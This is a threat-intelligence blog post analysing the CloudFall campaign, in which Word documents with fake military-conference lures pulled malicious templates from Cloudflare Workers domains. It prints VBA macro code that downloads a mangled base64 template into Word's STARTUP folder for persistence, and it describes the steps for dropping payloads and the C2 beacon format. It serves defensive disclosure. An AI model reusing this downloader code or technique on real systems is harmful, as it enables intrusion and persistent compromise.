Quantcast
Channel: Blogs Feed
Viewing all articles
Browse latest Browse all 1472

CloudFall Targets Researchers and Scientists Invited to International Military Conferences in Central Asia and Eastern Europe

$
0
0
In August 2021, Zscaler ThreatLabz identified several malicious Microsoft Word documents which used a multi-stage attack-chain abusing Cloudflare Workers and features of MS Office Word to target users in Central Asia and Eastern Europe. Based on the social engineering lures used in the decoy content, we conclude with a moderate confidence level that the targets of this campaign were scientists and researchers who were invited to International military conferences. This multi-stage attack chain involves several new tactics, techniques, and procedures (TTPs) which have not been documented before. In the remainder of this blog, we'll share the technical details of the attack as well as threat attribution. We have named this threat actor CloudFall based on the network infrastructure used by them. There is also a strong overlap between this threat actor and the CloudAtlas APT group. We will explain this in more detail in the threat attribution section of the blog. Unlike common macro-based document attacks, in this targeted campaign we observed the threat actor abusing MS Office Word features to evade automated analysis systems. There were multiple variants of attack-chains used by this threat actor which highlight the adversary's deep understanding of the MS Office Word application. Threat Attribution We performed threat attribution based on the below 4 parameters. 1. Attack-chain 2. Naming convention of attacker-controlled C2 domains 3. Regions targeted and content of the decoy files 4. Correlation of creation and compilation timestamp of all the artifacts (documents and payloads) Attack-chain: In all the cases, an MS Office Word document was used to download a remote document template and carry out the attack in multiple stages. A lot of TTPs in this attack-chain have not been seen before and are unique to the threat actor in this case. Naming conventions of attacker-controlled C2 domains: We observed a consistent pattern across all the C2 domains used in this targeted campaign. All the C2 servers used Cloudflare Worker domains and most of the subdomain names were crafted to spoof Microsoft service names such as Office 365. office365.dc-microsoft.workers[.]dev office365.microsoft-cloud.workers[.]dev asia.office365-cloud.workers[.]dev eu.microsoft-365.workers[.]dev api.office365online.workers[.]dev Regions targeted and content of the decoy files: Based on the instances we observed in this campaign, the regions targeted were Central Asia and Eastern Europe. Correlation of creation and compilation timestamp of all the artifacts: We checked the creation timestamp for each of the stage-1 documents as well as the compilation timestamp of the payloads. All the timestamps were in the range: 5:30 AM UTC to 8:30 AM UTC Based on this, we can say with a moderate confidence level that the threat actor was located in the eastern part of the world. By combining all of the above observations, we can say with a moderate confidence level that there is an overlap with CloudAtlas APT threat actor. CloudAtlas APT has targeted users in Central Asia and Eastern Europe in the past with documents sent in spear-phishing emails and downloaded remote templates. CloudAtlas has also abused legitimate cloud-based services, such as CloudMe, in the past and used domain names that spoof legitimate Microsoft services. The tactics, techniques, and procedures (TTPs) are very unique in this instance so we cannot use them to specifically attribute to any threat actor. Document decoy contents Each MS Office Word document in this targeted campaign displays an overlay image which will be replaced by text when the document load is completed in the MS Office Word application. For the document with MD5 hash: 4cf8b660a79fc1b7cc4ea6422a02347d, seen in Figure 1, the cover image is the logo of the German Federal Foreign Office. Figure 1: Cover image displayed in Stage-1 document All the cover images of the remaining documents are shared in Appendix I. These cover images also give a quick idea about the targeted region of the campaign. The text content behind this overlay image is as shown in Figure 2. Figure 2: Text present inside the document behind the cover image The text displayed contains information about the International Conference on Military Strategies and Methods. This conference invites researchers, scientists, and research scholars. The invitation above is a "Call for contribution". Based on this, we conclude that the targets of this campaign are researchers and scientists related to various disciplines such as Military strategy. Attack flow In this campaign, the threat actor used a complex multi-stage attack-chain, which we illustrate in Figure 3. This attack chain will be explained in more details step-by-step in the Technical Analysis section of the blog. Also, it is important to note that there are 2 different variants of attack-chains that we observed for this threat actor. The second and the new variant was used for the first time on August 25th 2021 and we describe it later in the blog in the "Attack-chain: Variant 2" section. Variant #1 Figure 3: Attack-chain of first variant Technical analysis In this section, we will look at the first variant of the attack-chain. For the purpose of technical analysis we will consider the document with MD5 hash: 4cf8b660a79fc1b7cc4ea6422a02347d Stage-1: Main document Stage-1 document fetches a macro-based template document hosted on the attacker-controlled website and lures the user to enable the macros. The interesting thing to note here is that the attacker doesn’t use the standard DOCX file format (OOXML) for template injection where we have the XML file referencing the document template from a network path. Instead, in this case, the template injection is performed using the DOC file format. As a result, static analysis tools like olevba cannot be used to extract the URL. Stage-2: Macro-based template document Once macros are enabled by the user, the VBA macro code inside the downloaded template is executed. The macro code performs the following operations: 1. When the document is opened, it hides the decoy image shown to the user. The image is an overlay for the text content which is displayed to the user once the macros are enabled. Below is the relevant VBA macro code responsible for this. Sub Document_Open() Dim i As Integer For i = ActiveDocument.Shapes.Count To 1 Step -1 ActiveDocument.Shapes(i).Delete Next i End Sub 2. When the document is closed, it checks whether a document template file is present in the path: "%appdata%\Microsoft\Word\STARTUP\Main.dotm". If this file is not found, then it will be downloaded and saved in this location. It's important to note that the above directory path corresponds to STARTUP location used by Microsoft Office Word application to load global templates. The template file is downloaded as base64-encoded data from the URL: "https://cloud.digitalstorage.workers[.]dev/old/data". The downloaded base64-encoded data is mangled and it requires a simple character substitution before decoding. Macro replaces "$" with "A" and "#" with "Q" in the mangled response before base64-decoding. Below is the relevant VBA macro code responsible for this. Sub Document_Close() If Dir(Environ$("APPDATA") + "\Microsoft\Word\STARTUP\Main.dotm", vbDirectory) = vbNullString Then Dim xmlhttp As New MSXML2.XMLHTTP60 Dim data As String Dim fileData As Integer: fileData = FreeFile xmlhttp.Open "GET", "https://cloud.digitalstorage.workers[.]dev/old/data", False xmlhttp.send If Len(xmlhttp.responseText) > 0 Then Open Environ$("APPDATA") + "\Microsoft\Word\STARTUP\Main.dotm" For Binary Access Write As fileData Put fileData, , DecodeBase64(Replace(Replace(xmlhttp.responseText, "$", "A"), "#", "Q")) Close End If End Sub Stage-3: Persistence template The template file "Main.dotm" acts as a persistence template since it is loaded whenever the Microsoft Word application is started. Similar to Stage-2, this is also a macro-based template. The malicious macro code is defined under the AutoExit function which is executed when the Microsoft Word application is closed or the global template defining it is unloaded. Upon execution, the macro code downloads a base64-encoded binary either from "mirror.advancestore.workers[.]dev/max/bs" or "mirror.advancestore.workers[.]dev/min/bs" based on the checks performed. Similar to Stage-2, the base64-encoded binary is mangled and requires character substitution before decoding. Once decoded, the macro code drops it as the next stage payload in the path %localappdata%\Photos\Microsoft.Photos.exe and executes it. Note: The dropped file name spoofs legitimate Windows binary for Microsoft Photos. Relevant code is shown in Figure 4. Figure 4: VBA macro code of Stage-3 persistence document template Stage-4: Dropped binary The Stage-4 dropped binary is heavily obfuscated using control flow obfuscation, function inlining, stack-based strings generation, strings encoding, etc which makes the dynamic analysis of the binary inside a debugger difficult. To further hinder the dynamic analysis using debugger, the binary performs self checksum check to detect any attached debugger. It also hooks the ZwProtectVirtualMemory API. To allocate memory region for trampoline, the binary performs memory allocation brute force to allocate the memory just after the last loaded dll memory space. Figure 5 below shows the trampoline code. Figure 5: API hook added for ZwProtectVirtualMemory with an unconditional JMP trampoline Executing further, the malicious binary checks for the presence of the file conf.h in the current working directory. If the file exists, it tries to read and parse it. Figure 6 below shows the code which performs string generation and does the file existence check for conf.h Figure 6: Code section which performs conf.h string generation and file existence check Note: The file is likely fetched and dropped by the binary as part of C2 communication If the conf.h file doesn’t exist, then it checks the following browser directories for the presence of specific files one at a time: 1. %appdata%\Mozilla\Firefox\Profiles 2. %localappdata%\Google\Chrome\User Data\Default 3. %appdata%\Opera Software\Opera Stable For the files found, it adds up the size of all these files and checks if it is greater than or equal to the specified threshold value. In case the calculated size is less than the threshold value or if none of the browser directory mentioned above exists, the binary terminates. Note: The size check is likely performed to detect analysis environments like Sandbox and Virtual Machine Following files are used for calculating the size in case of Chrome browser: %localappdata%\Google\Chrome\User Data\Default\History %localappdata%\Google\Chrome\User Data\Default\Visited Links %localappdata%\Google\Chrome\User Data\Default\Favicons %localappdata%\Google\Chrome\User Data\Default\Web Data %localappdata%\Google\Chrome\User Data\Default\Cookies %localappdata%\Google\Chrome\User Data\Default\Media History %localappdata%\Google\Chrome\User Data\Default\IndexedDB\{sub_dir}\* Figure 7 below shows the code responsible for performing the threshold check. Figure 7: Code section which performs the threshold check If the check passes for any of the three browser directories mentioned above then it starts the network communication. Network Communication The network communication is performed over standard TCP/IP protocol. The details for the C2 server communication are mentioned below: C2 Domain: curly-waterfall-360d.fetrikekke531.workers.dev Beacon request URI: auth/local/register Request Type: POST Data: {\"email\":\"01yql@mip6pq.local\",\"password\":\">*#-L:3Wy5;;#/[N^{uh{P6t\",\"username\":\"B60FB93BC49DF8848C4AF287BC112CF6_oAj\"} Inside the POST request data there are three key-value pairs which are generated as specified below. email - {random_data}@{random_data}.local password - {random_data} username - {encoded %USERPROFILE% creation timestamp}_{random_data} Note: During analysis we didn’t get any active response from the C2 server. As a result, we couldn’t analyse the full behaviour of the malicious binary. [+] SSL Certificate The thumbprint of the SSL certificate of the C2 domain is: 5cdf93a4081898d99a686ad472b553cddaa9f3bf Below are some important details of this SSL certificate: Thumbprint: 5cdf93a4081898d99a686ad472b553cddaa9f3bf Signature Algorithm: sha256RSA Issuer: C=US CN=R3 O=Let's Encrypt Validity Not Before: 2021-08-18 06:57:36 Not After: 2021-11-16 06:57:34 Subject: CN=*.fetrikekke531.workers[.]dev Using the thumbprint of the SSL certificate as a pivot, we discovered another C2 domain: virustotall-360d.fetrikekke531.workers[.]dev As we can see, the subdomain in above domain spoofs VirusTotal. Attack-chain: Variant 2 The second variant of this attack, which we observed in August 2021 made significant changes to the macro code used in the document to deploy the payload on the machine. MD5 hash of the document: 2043b7129bfbe83c95a27c0a20d10612 Similar to variant 1, variant 2 also downloads a remote document template hosted on an attacker-controlled Cloudflare Worker instance. However, unlike variant 1, in this case, the persistence document template as well as the final payload—both are embedded inside the stage-2 document itself. It uses a clever technique to extract these contents and drop them on the machine. This attack flow can be represented using the diagram shown in Figure 8. Variant #2 Figure 8: Attack-chain of the second variant Below is the description of attack flow. 1. Stage-1 document downloads remote document template (Stage-2) 2. Since MS Office Word was used to download the document template (Stage-2), by default it will be present inside the INetCache directory. The VBA macro code uses a clever technique to locate this file in the path: "%localappdata%\Microsoft\Windows\INetCache\Content.MSO\" as shown in Figure 9. Figure 9: VBA macro code of Stage-2 document template of variant 2 a) This code enumerates the files in the directory: "%localappdata%\Microsoft\Windows\INetCache\Content.MSO\" until it finds a file with size 70400 (truncated) b) Once it finds the file, it will Unzip the contents to the directory path: "%localappdata%\VirtualEnv". OOXML file format is essentially an archive file format, and that’s why the macro unzips it. c) Inside the OOXML file, there is an XML file called Archive.xml which contains an encoded version of the persistence template. This is decoded and dropped to the path: %appdata%\Microsoft\Word\STARTUP\Settings.dotm d) In order to decode the contents of Archive.xml it performs character substitution to restore the original characters of the base64-encoded string. Then it adds the prefix: "UEs" and base64 decodes it. Code: Base64Decode("UEs" + Replace(Replace(data, "#", "A"), "@", "Q")) This type of custom base64 decoding is similar to variant 1 3. Once a new instance of the Word application is started on the machine, this persistence template is loaded and the next sequence of steps are carried out to drop the final payload as shown in Figure 10. Figure 10: VBA macro code of persistence template of variant 2 a) Decodes and extracts the payload from WebArchive.xml file. The method for decoding is similar to the one described previously. b) The decoded file is the final payload which will be dropped to the path: %localappdata%\VirtualEnv\word\Virtual.exe 4. Finally the payload Virtual.exe will be executed. This payload is similar to the one described above. Zscaler Cloud Sandbox detection Figure 11 shows the sandbox detection for the final payload. Figure 11: Zscaler Cloud Sandbox detection In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels. Win32.Backdoor.CloudFall Win64.Backdoor.CloudFall VBA.Downloader.CloudFall Indicators of compromise [+] Document Hashes MD5 File name Uploader country 4774483bb72ddfa0f6e4b8c5be7093dd Military cooperation 2021.doc Ukraine e4c29642f3803b1bc9aa61603696bb4b International Conference on Military Strategy and Strategic Intelligence 2021.doc India 5cba8589a4a76377f9340ef30d6fec41 Tender information.doc Kazakhstan 4cf8b660a79fc1b7cc4ea6422a02347d CONFIDENTIAL - International Conference on Military Strategies and Methods.doc Switzerland 2043b7129bfbe83c95a27c0a20d10612 Situation report - August 25.doc USA [+] Binary Hashes MD5 File name e35a1add6ddc944e9a757cb65a73db19 Microsoft.Photos.exe abe0b037dfa52d895c1cd8148988fcc1 Virtual.exe [+] C2 Domains - Documents documents.publicserver[.]workers.dev office365.dc-microsoft.workers[.]dev cloud.digitalstorage.workers[.]dev plug.repository.workers[.]dev mirror.advancestore.workers[.]dev office365.microsoft-cloud.workers[.]dev asia.office365-cloud.workers[.]dev eu.microsoft-365.workers[.]dev api.office365online.workers[.]dev [+] C2 Domains - Dropped binary curly-waterfall-360d.fetrikekke531.workers[.]dev falling-haze-1812.jerkufetra754.workers[.]dev [+] C2 domains - Additional virustotall-360d.fetrikekke531.workers[.]dev falling-haze-1813.jerkufetra754.workers[.]dev [+] Download URL Component URL Stage-2 marco doc documents.publicserver[.]workers.dev/docs/lates office365.dc-microsoft.workers[.]dev/main/doc office365.microsoft-cloud.workers[.]dev/encoding/data/office asia.office365-cloud.workers[.]dev/office/online Stage-3 persistence template cloud.digitalstorage.workers[.]dev/old/data plug.repository.workers[.]dev/modules/private Stage-4 exe payload mirror.advancestore.workers[.]dev/max/bs mirror.advancestore.workers[.]dev/min/bs public.datastore.workers[.]dev/strong/bs [+] SSL certificate thumbprints 5cdf93a4081898d99a686ad472b553cddaa9f3bf c4c3394b0fe4534f5c63ad395cc028b347ba4fa3 [+] File paths ​ // Persistence template %appdata%\Microsoft\Word\STARTUP\Main.dotm %appdata%\Microsoft\Word\STARTUP\Future.dotm %appdata%\Microsoft\Word\STARTUP\Settings.dotm // Dropped/Downloaded files %localappdata%\Photos\Microsoft.Photos.exe %localappdata%\Tools\build.exe %localappdata%\VirtualEnv\word\virtual.exe %localappdata%\Photos\conf.h %localappdata%\VirtualEnv\word\conf.xml Appendix I [+] Decoy #2 [+] Decoy #3 [+] Decoy #4 [+] Decoy #5 Appendix II // Conferences referenced in decoy content http://researchworld.org/Conference2021/Uzbekistan/1/I2C2E/ https://waset.org/military-strategy-and-strategic-intelligence-conference https://www.offshore-technology.com/comment/saudi-aramco-berri-field-upgrade/ https://waset.org/military-studies-and-leadership-conference

Viewing all articles
Browse latest Browse all 1472

Trending Articles